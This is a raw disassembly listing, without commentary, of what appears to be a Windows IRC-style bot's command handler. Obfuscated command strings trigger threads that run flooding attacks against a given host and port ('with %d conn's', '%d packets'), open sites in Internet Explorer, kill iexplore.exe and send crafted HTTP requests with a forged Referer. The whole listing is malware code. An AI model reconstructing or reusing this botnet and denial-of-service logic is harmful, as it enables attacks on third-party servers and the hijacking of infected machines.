call sub_41CD84
add esp, 1Ch
loc_4121FB: ; CODE XREF: sub_40A938+7890�j
cmp [ebp+arg_18], 0
jz short loc_41222B
loc_412201: ; CODE XREF: sub_40A938+7896�j
push dword ptr [ebx+0Ch]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+4]
push edi
push offset aSSDForDSecS ; "%s --> (%s:%d) for %d sec's"
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CD0E
add esp, 1Ch
loc_41222B: ; CODE XREF: sub_40A938+78C7�j
push dword ptr [ebx+0Ch]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+4]
push edi
push offset aSSForDSecS ; "%s --> (%s) for %d sec's"
push 0Dh
call sub_4233DE
add esp, 18h
mov [ebp+var_1298], eax
lea eax, [ebp+arg_0]
xor edi, edi
push eax
lea eax, [ebp+var_139C]
push edi
push eax
push offset sub_4229BF
push edi
push edi
call dword_43717C ; CreateThread
mov ecx, [ebp+var_1298]
imul ecx, 2724h
cmp eax, edi
mov dword_46D70C[ecx], eax
jnz short loc_4122DB
cmp [ebp+arg_14], 0
mov ebx, dword_43716C
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_4122BC
cmp [ebp+arg_18], 0
jnz short loc_4122C6
call ebx ; dword_43716C
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset aXwzwo1pqcgt16n ; "XWzwO1PqcgT16N5aw.affEY1"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_4122BC: ; CODE XREF: sub_40A938+7960�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_4122C6: ; CODE XREF: sub_40A938+7966�j
call ebx ; dword_43716C
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
jmp loc_41213B
; ---------------------------------------------------------------------------
loc_4122D3: ; CODE XREF: sub_40A938+79AA�j
push 32h
call dword_43718C ; Sleep
loc_4122DB: ; CODE XREF: sub_40A938+794F�j
cmp [ebp+var_127C], 0
jz short loc_4122D3
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_4122E9: ; CODE XREF: sub_40A938+7798�j
; sub_40A938+77A1�j ...
mov edi, offset aXwzwo1pqcgt16n ; "XWzwO1PqcgT16N5aw.affEY1"
jmp loc_40BE4A
; ---------------------------------------------------------------------------
loc_4122F3: ; CODE XREF: sub_40A938+778D�j
push dword ptr [ebx]
push offset aWt4rnWgl6v_ ; "wt4Rn/WGL6V."
call edi ; dword_437174
test eax, eax
jnz short loc_41230A
push offset aXwzwo1pqcgt16n ; "XWzwO1PqcgT16N5aw.affEY1"
jmp loc_4127E3
; ---------------------------------------------------------------------------
loc_41230A: ; CODE XREF: sub_40A938+79C6�j
push dword ptr [ebx]
push offset aW1w2v121jsp_ ; "w1w2V121JSP."
call edi ; dword_437174
test eax, eax
jnz loc_412494
cmp [ebx+4], eax
jz loc_4125CB
cmp [ebx+8], eax
jz loc_4125CB
cmp [ebx+0Ch], eax
jz loc_4125CB
cmp [ebx+10h], eax
jz loc_4125CB
push 0Dh
call sub_423737
cmp eax, 32h
pop ecx
mov [ebp+arg_C], eax
jg loc_4124E1
mov edi, [ebp+arg_18]
lea eax, [ebp+var_FB4]
test edi, edi
jnz short loc_412365
push dword ptr [esi+0Ch]
jmp short loc_412367
; ---------------------------------------------------------------------------
loc_412365: ; CODE XREF: sub_40A938+7A26�j
push dword ptr [esi]
loc_412367: ; CODE XREF: sub_40A938+7A2B�j
push eax
call dword_4370A4 ; lstrcpyA
mov eax, [ebp+arg_10]
push 7Fh
mov [ebp+var_1038], eax
push dword ptr [ebx+4]
lea eax, [ebp+var_1034]
push eax
call sub_429C40
push dword ptr [ebx+8]
call sub_42A030
mov [ebp+var_F34], eax
push dword ptr [ebx+0Ch]
call sub_42A030
mov [ebp+var_F30], eax
push dword ptr [ebx+10h]
call sub_42A030
mov [ebp+var_F2C], eax
mov eax, [ebp+arg_14]
mov [ebp+var_F24], edi
mov [ebp+var_F20], eax
push dword ptr [ebx+10h]
call sub_42A030
add esp, 1Ch
push eax
push dword ptr [ebx+0Ch]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+4]
push offset aVfeso_qcgdt_ ; "vfEsO.QcgDt."
push offset aSSDWithDConnSF ; "%s --> (%s:%d) with %d conn's for %d se"...
push 0Dh
call sub_4233DE
add esp, 1Ch
mov [ebp+var_F28], eax
lea eax, [ebp+arg_0]
xor edi, edi
push eax
lea eax, [ebp+var_1038]
push edi
push eax
push offset sub_418A0D
push edi
push edi
call dword_43717C ; CreateThread
mov ecx, [ebp+var_F28]
imul ecx, 2724h
cmp eax, edi
mov dword_46D70C[ecx], eax
jnz short loc_412486
loc_41242F: ; CODE XREF: sub_40A938+7C75�j
cmp [ebp+arg_14], 0
mov ebx, dword_43716C
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_412462
cmp [ebp+arg_18], 0
jnz short loc_41246C
call ebx ; dword_43716C
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset aVfeso_qcgdt_ ; "vfEsO.QcgDt."
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_412462: ; CODE XREF: sub_40A938+7B06�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_41246C: ; CODE XREF: sub_40A938+7B0C�j
call ebx ; dword_43716C
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset aVfeso_qcgdt_ ; "vfEsO.QcgDt."
jmp loc_414856
; ---------------------------------------------------------------------------
loc_41247E: ; CODE XREF: sub_40A938+7B55�j
push 32h
call dword_43718C ; Sleep
loc_412486: ; CODE XREF: sub_40A938+7AF5�j
cmp [ebp+var_F1C], 0
jz short loc_41247E
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_412494: ; CODE XREF: sub_40A938+79DD�j
push dword ptr [ebx]
push offset aVz62d1m0yya ; "Vz62d1m0Yya/"
call edi ; dword_437174
test eax, eax
jz loc_412618
push dword ptr [ebx]
push offset aF4c9z1ubcg80 ; "F4c9z1UBCg80"
call edi ; dword_437174
test eax, eax
jnz loc_41260B
cmp [ebx+4], eax
jz loc_4125CB
cmp [ebx+8], eax
jz loc_4125CB
cmp [ebx+0Ch], eax
jz loc_4125CB
push 0Dh
call sub_423737
cmp eax, 32h
pop ecx
mov [ebp+arg_C], eax
jle short loc_4124EB
loc_4124E1: ; CODE XREF: sub_40A938+7A15�j
mov ebx, offset aVfeso_qcgdt_ ; "vfEsO.QcgDt."
jmp loc_40B89E
; ---------------------------------------------------------------------------
loc_4124EB: ; CODE XREF: sub_40A938+7BA7�j
mov edi, [ebp+arg_18]
lea eax, [ebp+var_18E4]
test edi, edi
jnz short loc_4124FD
push dword ptr [esi+0Ch]
jmp short loc_4124FF
; ---------------------------------------------------------------------------
loc_4124FD: ; CODE XREF: sub_40A938+7BBE�j
push dword ptr [esi]
loc_4124FF: ; CODE XREF: sub_40A938+7BC3�j
push eax
call dword_4370A4 ; lstrcpyA
mov eax, [ebp+arg_10]
push 7Fh
mov [ebp+var_1968], eax
push dword ptr [ebx+4]
lea eax, [ebp+var_1964]
push eax
call sub_429C40
push dword ptr [ebx+8]
call sub_42A030
mov [ebp+var_1860], eax
push dword ptr [ebx+0Ch]
call sub_42A030
mov [ebp+var_185C], eax
mov eax, [ebp+arg_14]
mov [ebp+var_1858], edi
mov [ebp+var_1854], eax
push dword ptr [ebx+0Ch]
call sub_42A030
add esp, 18h
push eax
push dword ptr [ebx+8]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+4]
push offset aVfeso_qcgdt_ ; "vfEsO.QcgDt."
push offset aSSDWithDPacks ; "%s --> (%s:%d) with %d packs"
push 0Dh
call sub_4233DE
add esp, 18h
mov [ebp+var_1864], eax
lea eax, [ebp+arg_0]
xor edi, edi
push eax
lea eax, [ebp+var_1968]
push edi
push eax
push offset sub_4289AF
push edi
push edi
call dword_43717C ; CreateThread
mov ecx, [ebp+var_1864]
imul ecx, 2724h
cmp eax, edi
mov dword_46D70C[ecx], eax
jz loc_41242F
jmp short loc_4125BD
; ---------------------------------------------------------------------------
loc_4125B5: ; CODE XREF: sub_40A938+7C8C�j
push 32h
call dword_43718C ; Sleep
loc_4125BD: ; CODE XREF: sub_40A938+7C7B�j
cmp [ebp+var_1850], 0
jz short loc_4125B5
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_4125CB: ; CODE XREF: sub_40A938+79E6�j
; sub_40A938+79EF�j ...
cmp [ebp+arg_14], 0
mov edi, offset aSS_1 ; "%s %s"
mov ebx, offset aFoabg1acvfoOsd ; "fOaBg1ACVfo/osdpb1E0v95."
jnz short loc_4125F6
cmp [ebp+arg_18], 0
jnz short loc_412600
push ebx
push offset aVfeso_qcgdt_ ; "vfEsO.QcgDt."
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 14h
loc_4125F6: ; CODE XREF: sub_40A938+7CA1�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_412600: ; CODE XREF: sub_40A938+7CA7�j
push ebx
push offset aVfeso_qcgdt_ ; "vfEsO.QcgDt."
jmp loc_40C7CB
; ---------------------------------------------------------------------------
loc_41260B: ; CODE XREF: sub_40A938+7B78�j
push dword ptr [ebx]
push offset a2yclo0srxpi ; "2YClO0SRxpi/"
call edi ; dword_437174
test eax, eax
jnz short loc_412622
loc_412618: ; CODE XREF: sub_40A938+7B67�j
push offset aVfeso_qcgdt_ ; "vfEsO.QcgDt."
jmp loc_4127E3
; ---------------------------------------------------------------------------
loc_412622: ; CODE XREF: sub_40A938+7CDE�j
push dword ptr [ebx]
push offset aH3yh9_xq_s2_ ; "h3YH9.Xq.S2."
call edi ; dword_437174
test eax, eax
jnz loc_4127D1
cmp [ebx+4], eax
jz loc_412791
cmp [ebx+8], eax
jz loc_412791
cmp [ebx+0Ch], eax
jz loc_412791
push 0Dh
call sub_423737
cmp eax, 32h
pop ecx
mov [ebp+arg_C], eax
jle short loc_412668
mov ebx, offset aSsoce0jbtxi ; "sSOce0JbTXI/"
jmp loc_40B89E
; ---------------------------------------------------------------------------
loc_412668: ; CODE XREF: sub_40A938+7D24�j
mov edi, [ebp+arg_18]
lea eax, [ebp+var_17C8]
test edi, edi
jnz short loc_41267A
push dword ptr [esi+0Ch]
jmp short loc_41267C
; ---------------------------------------------------------------------------
loc_41267A: ; CODE XREF: sub_40A938+7D3B�j
push dword ptr [esi]
loc_41267C: ; CODE XREF: sub_40A938+7D40�j
push eax
call dword_4370A4 ; lstrcpyA
mov eax, [ebp+arg_10]
push 7Fh
mov [ebp+var_184C], eax
push dword ptr [ebx+4]
lea eax, [ebp+var_1848]
push eax
call sub_429C40
push dword ptr [ebx+8]
call sub_42A030
mov [ebp+var_1748], eax
push dword ptr [ebx+0Ch]
call sub_42A030
mov [ebp+var_1744], eax
mov eax, [ebp+arg_14]
mov [ebp+var_1738], edi
mov [ebp+var_1734], eax
push dword ptr [ebx+0Ch]
call sub_42A030
add esp, 18h
push eax
push dword ptr [ebx+8]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+4]
push offset aSsoce0jbtxi ; "sSOce0JbTXI/"
push offset aSSDWithDPacks ; "%s --> (%s:%d) with %d packs"
push 0Dh
call sub_4233DE
add esp, 18h
mov [ebp+var_173C], eax
lea eax, [ebp+arg_0]
xor edi, edi
push eax
lea eax, [ebp+var_184C]
push edi
push eax
push offset sub_4274B2
push edi
push edi
call dword_43717C ; CreateThread
mov ecx, [ebp+var_173C]
imul ecx, 2724h
cmp eax, edi
mov dword_46D70C[ecx], eax
jnz short loc_412783
cmp [ebp+arg_14], 0
mov ebx, dword_43716C
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_41275F
cmp [ebp+arg_18], 0
jnz short loc_412769
call ebx ; dword_43716C
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset aSsoce0jbtxi ; "sSOce0JbTXI/"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_41275F: ; CODE XREF: sub_40A938+7E03�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_412769: ; CODE XREF: sub_40A938+7E09�j
call ebx ; dword_43716C
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset aSsoce0jbtxi ; "sSOce0JbTXI/"
jmp loc_414856
; ---------------------------------------------------------------------------
loc_41277B: ; CODE XREF: sub_40A938+7E52�j
push 32h
call dword_43718C ; Sleep
loc_412783: ; CODE XREF: sub_40A938+7DF2�j
cmp [ebp+var_1730], 0
jz short loc_41277B
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_412791: ; CODE XREF: sub_40A938+7CFE�j
; sub_40A938+7D07�j ...
cmp [ebp+arg_14], 0
mov edi, offset aSS_1 ; "%s %s"
mov ebx, offset aFoabg1acvfoOsd ; "fOaBg1ACVfo/osdpb1E0v95."
jnz short loc_4127BC
cmp [ebp+arg_18], 0
jnz short loc_4127C6
push ebx
push offset aSsoce0jbtxi ; "sSOce0JbTXI/"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 14h
loc_4127BC: ; CODE XREF: sub_40A938+7E67�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_4127C6: ; CODE XREF: sub_40A938+7E6D�j
push ebx
push offset aSsoce0jbtxi ; "sSOce0JbTXI/"
jmp loc_40C7CB
; ---------------------------------------------------------------------------
loc_4127D1: ; CODE XREF: sub_40A938+7CF5�j
push dword ptr [ebx]
push offset aIwbkf0o1om6Qrn ; "IwBKf0O1Om6/QRn4z10ge1I1"
call edi ; dword_437174
test eax, eax
jnz short loc_4127EA
push offset aSsoce0jbtxi ; "sSOce0JbTXI/"
loc_4127E3: ; CODE XREF: sub_40A938+6BB2�j
; sub_40A938+6C0D�j ...
push 0Dh
jmp loc_412A63
; ---------------------------------------------------------------------------
loc_4127EA: ; CODE XREF: sub_40A938+7EA4�j
push dword ptr [ebx]
push offset aEm42x_1iszi1 ; "Em42x.1IsZI1"
call edi ; dword_437174
test eax, eax
jnz loc_412A4F
xor edi, edi
cmp [ebx+4], edi
jz loc_412F03
cmp [ebx+8], edi
jz loc_412F03
cmp [ebx+0Ch], edi
jz loc_412F03
cmp [ebx+10h], edi
jz loc_412F03
cmp [ebx+14h], edi
jz loc_412F03
push 0Eh
call sub_423737
cmp eax, 32h
pop ecx
mov [ebp+arg_C], eax
jle short loc_412880
loc_41283A: ; CODE XREF: sub_40A938+817F�j
cmp [ebp+arg_14], 0
mov ebx, offset aJqrlpUxr08Qqdu ; "JQrlp/UXr08/qqduw/ZeDHN/N/Wda.tYScO0znN"...
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_412868
cmp [ebp+arg_18], 0
jnz short loc_412872
push [ebp+arg_C]
push ebx
push offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_412868: ; CODE XREF: sub_40A938+7F10�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_412872: ; CODE XREF: sub_40A938+7F16�j
push [ebp+arg_C]
push ebx
loc_412876: ; CODE XREF: sub_40A938+80FC�j
push offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
jmp loc_414856
; ---------------------------------------------------------------------------
loc_412880: ; CODE XREF: sub_40A938+7F00�j
mov eax, [ebp+arg_14]
mov [ebp+var_63DC], eax
mov eax, [ebp+arg_18]
mov [ebp+var_63E0], eax
cmp eax, edi
lea eax, [ebp+var_6478]
jnz short loc_4128A1
push dword ptr [esi+0Ch]
jmp short loc_4128A3
; ---------------------------------------------------------------------------
loc_4128A1: ; CODE XREF: sub_40A938+7F62�j
push dword ptr [esi]
loc_4128A3: ; CODE XREF: sub_40A938+7F67�j
push eax
call dword_4370A4 ; lstrcpyA
mov eax, [ebp+arg_10]
mov edi, 3FFh
push edi
mov [ebp+var_6C7C], eax
push dword ptr [ebx+4]
lea eax, [ebp+var_6C78]
push eax
call sub_429C40
push dword ptr [ebx+8]
call sub_42A030
mov [ebp+var_63F4], eax
push dword ptr [ebx+0Ch]
call sub_42A030
mov [ebp+var_63F0], eax
push dword ptr [ebx+10h]
call sub_42A030
add esp, 18h
cmp eax, 1
mov [ebp+var_63E8], eax
jge short loc_412904
mov edi, offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
jmp loc_413CB1
; ---------------------------------------------------------------------------
loc_412904: ; CODE XREF: sub_40A938+7FC0�j
push edi
lea eax, [ebp+var_6878]
push dword ptr [ebx+14h]
push eax
call sub_429C40
xor eax, eax
add esp, 0Ch
cmp [ebp+arg_60], eax
mov edi, offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
setnz al
cmp [ebp+arg_14], 0
mov [ebp+var_63E4], eax
jnz short loc_412961
cmp [ebp+arg_18], 0
jnz short loc_412967
push dword ptr [ebx+0Ch]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+4]
push edi
push offset aSSDDPackets_ ; "%s --> (%s:%d) %d packets."
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 1Ch
loc_412961: ; CODE XREF: sub_40A938+7FF6�j
cmp [ebp+arg_18], 0
jz short loc_412991
loc_412967: ; CODE XREF: sub_40A938+7FFC�j
push dword ptr [ebx+0Ch]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+4]
push edi
push offset aSSDDPackets_ ; "%s --> (%s:%d) %d packets."
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CD0E
add esp, 1Ch
loc_412991: ; CODE XREF: sub_40A938+802D�j
push dword ptr [ebx+0Ch]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+4]
push edi
push offset aSSDDPackets_ ; "%s --> (%s:%d) %d packets."
push 0Eh
call sub_4233DE
add esp, 18h
mov [ebp+var_63F8], eax
lea eax, [ebp+arg_0]
xor edi, edi
push eax
lea eax, [ebp+var_6C7C]
push edi
push eax
push offset loc_419FC5
push edi
push edi
call dword_43717C ; CreateThread
mov ecx, [ebp+var_63F8]
imul ecx, 2724h
cmp eax, edi
mov dword_46D70C[ecx], eax
jnz short loc_412A41
loc_4129EF: ; CODE XREF: sub_40A938+8271�j
cmp [ebp+arg_14], 0
mov ebx, dword_43716C
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_412A22
cmp [ebp+arg_18], 0
jnz short loc_412A2C
call ebx ; dword_43716C
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_412A22: ; CODE XREF: sub_40A938+80C6�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_412A2C: ; CODE XREF: sub_40A938+80CC�j
call ebx ; dword_43716C
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
jmp loc_412876
; ---------------------------------------------------------------------------
loc_412A39: ; CODE XREF: sub_40A938+8110�j
push 32h
call dword_43718C ; Sleep
loc_412A41: ; CODE XREF: sub_40A938+80B5�j
cmp [ebp+var_63D8], 0
jz short loc_412A39
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_412A4F: ; CODE XREF: sub_40A938+7EBD�j
push dword ptr [ebx]
push offset aErnniHm17t1qrn ; "ERNNi/HM17T1QRn4z10ge1I1"
call edi ; dword_437174
test eax, eax
jnz short loc_412A78
push offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
push 0Eh
loc_412A63: ; CODE XREF: sub_40A938+1096�j
; sub_40A938+189D�j ...
xor eax, eax
cmp [ebp+arg_18], eax
push eax
push [ebp+arg_20]
jnz loc_40B9D3
push eax
jmp loc_412BE3
; ---------------------------------------------------------------------------
loc_412A78: ; CODE XREF: sub_40A938+8122�j
push dword ptr [ebx]
push offset aKmdie1uwntq ; "KmdIe1UwntQ/"
call edi ; dword_437174
test eax, eax
jnz loc_412BC7
cmp [ebx+4], eax
jnz short loc_412AA9
cmp [ebp+arg_14], eax
mov edi, offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
mov ebx, offset aFoabg1acvfoOsd ; "fOaBg1ACVfo/osdpb1E0v95."
jnz loc_40BE74
cmp [ebp+arg_18], eax
jmp loc_40BE59
; ---------------------------------------------------------------------------
loc_412AA9: ; CODE XREF: sub_40A938+8154�j
push 0Eh
call sub_423737
cmp eax, 32h
pop ecx
mov [ebp+arg_C], eax
jg loc_41283A
mov eax, [ebp+arg_14]
mov [ebp+var_2644], eax
mov eax, [ebp+arg_18]
mov [ebp+var_2640], eax
test eax, eax
lea eax, [ebp+var_26C8]
jnz short loc_412ADE
push dword ptr [esi+0Ch]
jmp short loc_412AE0
; ---------------------------------------------------------------------------
loc_412ADE: ; CODE XREF: sub_40A938+819F�j
push dword ptr [esi]
loc_412AE0: ; CODE XREF: sub_40A938+81A4�j
push eax
call dword_4370A4 ; lstrcpyA
mov eax, [ebp+arg_10]
push 7Fh
mov [ebp+var_27CC], eax
push dword ptr [ebx+4]
lea eax, [ebp+var_27C8]
push eax
call sub_429C40
mov eax, [ebx+8]
add esp, 0Ch
test eax, eax
jz short loc_412B1D
push 7Fh
push eax
lea eax, [ebp+var_2748]
push eax
call sub_429C40
add esp, 0Ch
loc_412B1D: ; CODE XREF: sub_40A938+81D1�j
cmp [ebp+arg_14], 0
mov edi, offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
jnz short loc_412B45
cmp [ebp+arg_18], 0
jnz short loc_412B4B
push dword ptr [ebx+4]
push edi
push offset aSS__0 ; "%s --> (%s)."
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 14h
loc_412B45: ; CODE XREF: sub_40A938+81EE�j
cmp [ebp+arg_18], 0
jz short loc_412B61
loc_412B4B: ; CODE XREF: sub_40A938+81F4�j
push dword ptr [ebx+4]
push edi
push offset aSS__0 ; "%s --> (%s)."
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CD0E
add esp, 14h
loc_412B61: ; CODE XREF: sub_40A938+8211�j
push dword ptr [ebx+4]
push edi
push offset aSS__0 ; "%s --> (%s)."
push 0Eh
call sub_4233DE
add esp, 10h
mov [ebp+var_2648], eax
lea eax, [ebp+arg_0]
xor edi, edi
push eax
lea eax, [ebp+var_27CC]
push edi
push eax
push offset sub_42817F
push edi
push edi
call dword_43717C ; CreateThread
mov ecx, [ebp+var_2648]
imul ecx, 2724h
cmp eax, edi
mov dword_46D70C[ecx], eax
jz loc_4129EF
jmp short loc_412BB9
; ---------------------------------------------------------------------------
loc_412BB1: ; CODE XREF: sub_40A938+8288�j
push 32h
call dword_43718C ; Sleep
loc_412BB9: ; CODE XREF: sub_40A938+8277�j
cmp [ebp+var_263C], 0
jz short loc_412BB1
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_412BC7: ; CODE XREF: sub_40A938+814B�j
push dword ptr [ebx]
push offset aUpx0wCz2ei0qrn ; "UPx0W/cz2EI0QRn4z10ge1I1"
call edi ; dword_437174
test eax, eax
jnz short loc_412BF9
push offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
push 0Eh
loc_412BDB: ; CODE XREF: sub_40A938+1D04�j
push 0
push [ebp+arg_20]
push [ebp+arg_18]
loc_412BE3: ; CODE XREF: sub_40A938+813B�j
push [ebp+arg_14]
push [ebp+arg_10]
push dword ptr [esi+0Ch]
loc_412BEC: ; CODE XREF: sub_40A938+83�j
; sub_40A938+10A6�j
call sub_42358B
loc_412BF1: ; CODE XREF: sub_40A938+4CA�j
; sub_40A938+2305�j
add esp, 20h
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_412BF9: ; CODE XREF: sub_40A938+829A�j
push dword ptr [ebx]
push offset aV6jbh0k4uD_ ; "V6jBH0k4u/d."
call edi ; dword_437174
test eax, eax
jnz loc_412CA4
mov ebx, [ebx+4]
test ebx, ebx
jz loc_412F03
xor edi, edi
push edi
push edi
push ebx
push offset aIexplore ; "iexplore"
push offset aOpen ; "open"
push edi
call dword_43725C
test eax, eax
mov ebx, offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
jz short loc_412C72
cmp [ebp+arg_14], 0
mov edi, offset aSSiteOpened_ ; "%s Site opened."
jnz short loc_412C55
cmp [ebp+arg_18], 0
jnz short loc_412C5F
push ebx
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 10h
loc_412C55: ; CODE XREF: sub_40A938+8305�j
cmp [ebp+arg_18], 0
jz loc_412F27
loc_412C5F: ; CODE XREF: sub_40A938+830B�j
push ebx
push edi
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CD0E
add esp, 10h
xor edi, edi
jmp short loc_412C90
; ---------------------------------------------------------------------------
loc_412C72: ; CODE XREF: sub_40A938+82FA�j
cmp [ebp+arg_14], edi
jnz short loc_412C90
cmp [ebp+arg_18], edi
jnz short loc_412C99
push ebx
push offset aSSiteFailedToO ; "%s Site failed to open."
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 10h
loc_412C90: ; CODE XREF: sub_40A938+8338�j
; sub_40A938+833D�j
cmp [ebp+arg_18], edi
jz loc_412F27
loc_412C99: ; CODE XREF: sub_40A938+8342�j
push ebx
push offset aSSiteFailedToO ; "%s Site failed to open."
jmp loc_40B99A
; ---------------------------------------------------------------------------
loc_412CA4: ; CODE XREF: sub_40A938+82CC�j
push dword ptr [ebx]
push offset aB2smo_whkew_qr ; "B2smo.WHkeW.QRn4z10ge1I1"
call edi ; dword_437174
test eax, eax
jnz short loc_412CF7
push eax
push offset aIexplore_exe ; "iexplore.exe"
call sub_41FD79
cmp [ebp+arg_14], 0
pop ecx
pop ecx
mov edi, offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
mov ebx, offset aSS_1 ; "%s %s"
jnz short loc_412CE3
push offset aBnjcz_zig1m0 ; "bNJcZ.ziG1m0"
push edi
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 14h
loc_412CE3: ; CODE XREF: sub_40A938+8394�j
cmp [ebp+arg_18], 0
jz loc_4148CF
push offset aBnjcz_zig1m0 ; "bNJcZ.ziG1m0"
jmp loc_40B034
; ---------------------------------------------------------------------------
loc_412CF7: ; CODE XREF: sub_40A938+8377�j
push dword ptr [ebx]
push offset aVxg7n_qbmg90aa ; "vXG7N.qBMG90aA/Td0EX07M1"
call edi ; dword_437174
test eax, eax
jnz loc_412F0D
cmp [ebx+4], eax
jz loc_412F03
cmp [ebx+8], eax
jz loc_412F03
cmp [ebx+0Ch], eax
jz loc_412F03
cmp [ebx+10h], eax
jz loc_412F03
lea eax, [ebp+var_7310]
push eax
push 101h
call dword_4372B4 ; WSAStartup
push dword ptr [ebx+4]
call dword_4372A0 ; gethostbyname
mov edi, eax
test edi, edi
jnz short loc_412D94
cmp [ebp+arg_14], eax
mov edi, offset aVv3aj1ywfkc_xz ; "VV3AJ1ywFkC.XzinP/s/R0A."
mov ebx, offset aSSD ; "%s %s <%d>"
jnz short loc_412D78
call dword_43716C ; RtlGetLastWin32Error
push eax
push edi
push offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_412D78: ; CODE XREF: sub_40A938+8422�j
cmp [ebp+arg_18], 0
jz loc_4148CF
call dword_43716C ; RtlGetLastWin32Error
push eax
push edi
push offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
jmp loc_40B638
; ---------------------------------------------------------------------------
loc_412D94: ; CODE XREF: sub_40A938+8413�j
push 6
push 1
push 2
call dword_4372B8 ; socket
mov [ebp+arg_C], eax
mov [ebp+var_2F4], 2
mov eax, [edi+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_2F0], eax
push dword ptr [ebx+8]
call sub_42A030
pop ecx
push eax
call dword_4372C0 ; ntohs
mov [ebp+var_2F2], ax
lea eax, [ebp+var_2F4]
push 10h
push eax
push [ebp+arg_C]
call dword_4372C8 ; connect
cmp eax, 0FFFFFFFFh
jz short loc_412E4D
push dword ptr [ebx+4]
lea eax, [ebp+var_31AC]
push dword ptr [ebx+14h]
push dword ptr [ebx+10h]
push dword ptr [ebx+0Ch]
push offset aSSHttp1_1Refer ; "%s %s HTTP/1.1\r\nReferer: %s\r\nUser-Agent"...
push 100h
push eax
call sub_429AEE
add esp, 1Ch
xor ebx, ebx
lea eax, [ebp+var_31AC]
push ebx
push eax
call sub_4292D0
pop ecx
push eax
lea eax, [ebp+var_31AC]
push eax
